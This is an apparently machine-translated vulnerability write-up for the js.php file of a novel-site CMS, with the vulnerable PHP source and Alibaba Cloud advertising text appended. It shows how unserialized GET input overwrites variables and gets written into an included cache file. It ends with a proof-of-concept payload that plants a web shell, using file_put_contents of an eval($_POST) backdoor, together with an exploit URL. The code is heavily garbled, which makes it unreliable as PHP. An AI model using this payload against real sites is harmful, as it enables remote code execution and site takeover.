./Js. php
$ Arguments = $ hash = '';
02 isset ($ _ GET ['argument']) & $ argument = $ _ GET ['argument'];
03 isset ($ _ GET ['hash']) & $ hash = $ _ GET ['hash'];
04 $ arguments = unserialize (base64_decode ($ argument); // $ arguments parameters come from get (serialize in base64_encode ..)
05 print_r ($ arguments );
06 if (empty ($ arguments) |! Is_array ($ arguments ))
07 jsdie ('bad Request. Please check your argument .');
08 if (empty ($ hash) | $ hash! = Md5 ($ argument) // condition 1
09 jsdie ('bad Request. Please check your hash .');
10
11 echo _ TAB_NOVEL __;
12 foreach ($ arguments as $ k => $ v) // overwrite the variable.
13 $ k = $ v;
14 echo "15
16 if (empty ($ limit) |! Ris_int ($ limit) // condition 2
17 jsdie ('bad Request. Please limit a number .');
18 omitted
19
20 switch ($ kind ){
21 case 'vip ':
22 $ table = _ TAB_NOVEL __;
23 $ where = 'vip = 1 ';
24 break;
25 case 'original ':
26 $ table = _ TAB_NOVEL __;
27 $ where = 'author _ id> 0 ';
28 break;
29 case 'copied ':
30 $ table = _ TAB_NOVEL __;
31 $ where = 'author _ id = 0 ';
32 break;
33 default:
34 $ args = explode ('_', $ subject );
35 if (count ($ args) = 3 & $ args [2] & ris_int ($ args [2]) {
36 $ table = $ args [0] = 'store '? _ TAB_STORY _: _ TAB_NOVEL __;
37 $ where = ($ args [1] = 'content '? 'Content': 'subobject'). '='. $ args [2];
38}
39 break;
40}
41
42 if (! $ Table) // Condition 3
43 jsdie ('bad Request. Please choose a method .');
44
45 $ jscachefile = ROOT. "data/cache/js _ $ hash. php"; // hash is obtained ..
46
47 $ update = false;
48 if (! File_exists ($ jscachefile) | (TIMESTAMP-filemtime ($ jscachefile) >=$ cachetime ))
49 $ update = true;
50
51 if ($ update ){
52 $ content = "<? Php if (! Defined ('in _ read8') exit ('Access Denied ');?> \ N "; // The object must be included in the file to be viewed.
53
54 // $ SQL = "SELECT B. id, B. title, B. type_id, B. author, c. dateline, c. title as chapter_title, c. $ cid AS cid, v. name as volume_name FROM ". _ TAB_BOOK __. "B LEFT JOIN ". _ TAB_CHAPTER __. "c ON B. newchapterid = c. id left join ". _ TAB_VOLUME __. "v ON v. id = c. volume_id WHERE $ where order by B. updatetime desc limit $ limit ";
55 // $ result = $ db-> query ($ SQL );
56 $ wblock = $ db-> select (array (
57 'field' => 'id, title, author, subject, content, dateline, lastupdate ',
58 'from' => $ table,
59 'where' => 'where state IN (1, 2, 3) and'. $ where,
60 'order' => 'lastupdate desc ',
61 'limit' => $ limit,
62 'filter' => 'convert _ '. ($ table = _ TAB_NOVEL __? 'Noel': 'store'). '_ classes ',
63 ));
64
65 $ wblock = replace (html_show ($ wblock, false ));
66 if (! Empty ($ charset) & $ charset! = SYSCHARSET) $ wblock = convert ($ wblock, SYSCHARSET, $ charset );
67
68 addjs ('document. writeln ("<style type = \" text/css \ "/> ");');
69 addjs ('document. writeln (". update div. content {background: # F7F7F7; margin-top: 1px; width: 100%; padding: 5px 0 ;}");');
70 addjs ('document. writeln (". update div. left {float: left; margin-left: 3px; width: 70% ;}");');
71 addjs ('document. writeln (". update div. right {float: right; margin-right: 3px; width: 20% ;}");');
72 addjs ('document. writeln ("</style> ");');
73 addjs ('document. writeln ("<div class = \" update \ "> ");');
74
75 $ external = empty ($ openewindow )? '': ($ Openewindow = 'target '? 'Target = \ "_ blank \" ': ($ openewindow = 'rel ')? 'Rel = \ "external \"':''));
76 foreach ($ wblock as $ val ){
77 addjs ('document. writeln ("<table>"); '); // overwrite $ _ SYSTEM ['system'] ['site _ ADDR'] with variables. you can.
78 addjs ('document. writeln ("<tr> <td align = \" left \ "width = \" 70% \ "> & nbsp ;['. $ val ['subobject']. '] & nbsp; <a href = \"'. $ _ SYSTEM ['system'] ['site _ add']. '/'. ($ table = _ TAB_NOVEL __? 'Noel': 'store'). '. php? Bid = '. $ val ['id']. '\"'. $ external. 'style = \ "color: Green; \"> '. $ val ['title']. '</a> & nbsp; </td> ");');
79
80 addjs ('document. writeln ("<td align = \" right \ "width = \" 30% \ "> '. $ val ['autor']. '</a> & nbsp; & lt ;'. rdate ($ val ['lastupdate'],'m-d '). '& gt; </td> </tr> ");');
81 addjs ('document. writeln ("</table> ");');
82}
83 unset ($ wblock );
84
85 addjs ('document. writeln ("</div> ");');
86
87;
88 if (! Rfow ($ jscachefile, $ content) // The rfow function is the file put contents code.
89 jsdie ('can \'t write cache file. Please check your permission .');
90}
91
92 (! Include $ jscachefile) & jsdie ('can \'t read cache file. Please check your permission. '); // contains code that looks very similar to dede. Usage:
93
94
95 <? Php
96 $ a = array ("limit" => '1', '_ system' => array ('system' => array ('site _ ADDR' => "<? Php file_put_contents ('./c. php',' <? Php eval (\ $ _ POST [s])?> ')?> "), 'Kind' => 'original ');
97 echo serialize ($ );
98?>
Generate a serialize array and base64 www.2cto.com and then md5 url:/js. php? Argument = login/login & hash = ccfe8712c8669cf53b3a049f7872de86 this vulnerability is a bit like a variable overwrite, query the database, write a file, and then compare the inclusion process .. Local test ..
1 <A id = ematt: 90 href = "/content/uploadfile/201203/latest" target = _ blank jQuery1332059982027 = "6"> </A>
The author is a dog man.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
